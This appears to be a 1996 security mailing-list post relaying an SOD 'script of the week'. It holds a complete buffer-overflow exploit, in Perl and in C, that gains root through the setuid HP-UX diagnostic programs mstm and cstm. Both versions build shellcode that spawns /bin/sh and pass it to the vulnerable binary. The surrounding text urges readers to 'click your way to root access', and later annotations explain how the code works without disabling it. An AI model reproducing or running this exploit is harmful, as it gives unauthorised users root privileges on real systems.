This week: turn me on, dead man
From: aleph1 () underground org (Aleph One)
Date: Sat, 16 Nov 1996 11:38:33 -0800
From our SOD friends. Sponsored by the HP security team & the
energizer bunny. They keep going, and going, and going.

Aleph One / aleph1 () underground org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

--- cut here ---

Well, hello. Welcome back. We're glad to see you. Have a drink. Take off
that overcoat. Put down that submachine gun. Lay on the couch and pretend
you're a duck. I'll be over here sending scripts to the masses.

This week's script is the first of the buffer-overruns and it buggers up
two very similar setuid root programs in /usr/diag/bin, mstm and cstm.
It's only been playtested on the 9's, so use with care on the 10's, and
as always, start clicking your way to root access with scripts from the
folks at SOD.

Caveat Emptor

mstm and/or cstm loves you

perl script and C src for this week

--- stmo.pl ---
#!/usr/bin/perl
# working exploit for 9.X setuid root /usr/diag/bin/[cm]stm
#
# NOTE(review): attack tool, not a utility. It runs with no `use strict`
# or `use warnings` and exec()s a setuid-root binary with a crafted
# argument; only run it against a lab system you are authorised to test.
use FileHandle;

# Decode a string of hex digit pairs into the raw bytes they encode, one
# byte per two characters ("34010102" -> four bytes). Used below to build
# 4-byte instruction words from their hex encoding.
# ($bob is a package global: the sub never declares it.)
sub h2cs {
    local($stuff)=@_;
    local($rv);
    while($stuff !~ /^$/) {
        $bob=$stuff;
        $bob =~ s/^(..).*$/$1/;       # keep the leading hex pair
        $stuff =~ s/^..//;            # consume it from the input
        $rv.=chr(oct("0x${bob}"));    # append it as a single byte
    }
    return $rv;
}

# Payload layout: 2 alignment bytes, then one 4-byte word per h2cs() call.
# The mnemonics in the trailing comments are the author's annotations.
$code="AA"; # two byte alignment
$code.=h2cs("34010102"); # ldi 129,r1
$code.=h2cs("08220401"); # sub rp,r1,r1
$code.=h2cs("602002a6"); # stb r0,339(r1)
#$code.=h2cs("602002ac"); # stb r0,342(r1)   (left disabled here; stmo.c includes it)
$code.=h2cs("b43a0298"); # addi 332,r1,arg0
$code.=h2cs("34160176"); # ldi 187,r22
$code.=h2cs("34010276"); # ldi 315,r1
$code.=h2cs("08360216"); # and r22,r1,r22
$code.=h2cs("20200801"); # ldil l%c0000004,r1
$code.=h2cs("e420e008"); # ble 4(sr7,r1)
$code.=h2cs("08210280"); # NOP == xor r1,r1,r0
#$code.=h2cs("deadcafe"); # illegal instruction

# Pad the code section with 'C' up to exactly 208 bytes.
$num=208-length($code);
$code.="C"x$num;

# 16-byte data section: the string plus 'D' padding.
$data="/bin/sh.sh.";
$num=16-length($data);
$data.="D"x$num;

# NOTE(review): $of has not been assigned yet at this point, so this
# evaluates to 224 and the value is never read again -- dead statement.
$num=224-length($of);

$of=$code.$data;          # 208 + 16 = 224 bytes
$of.=h2cs("7b03301B");    # 4 trailing bytes (presumably the overwritten return slot -- the page does not say); total 228
print "Length is: ",length($of),"\n";

# List-form exec: no shell is involved. exec() replaces this process, so
# unlike stmo.c there is no fallback to cstm if mstm cannot be run.
exec("/usr/diag/bin/mstm","-l","$of");

--- stmo.c ---
/* SOD /usr/diag/bin/[cm]stm buffer overflow */
/* NOTE(review): no #include lines -- strcpy() and execl() are called through
 * implicit (K&R-era) declarations and main() has no declared return type. */
main() {
    char buf[500];
    /* Same shape as the Perl payload (2 alignment bytes, instruction words,
     * 'C' padding, 16-byte data, 4 trailing bytes) but NOT byte-identical to
     * it: this string includes the "stb r0,342(r1)" word (60 20 02 ac) that
     * stmo.pl leaves commented out, has an extra NOP word (08 21 02 80)
     * before the ldil, and carries "/bin/sh.-i." instead of "/bin/sh.sh.".
     * The literal is a few hundred bytes, well under buf's 500, so the
     * strcpy() itself is in bounds; the overflow is in [cm]stm, not here. */
    strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\x03\x30\x1b");
    execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0);
    /* Either-or, same overflow */
    /* Reached only if the mstm execl() returns, i.e. fails. If this one
     * fails as well, main() falls off the end without reporting anything. */
    execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0);
}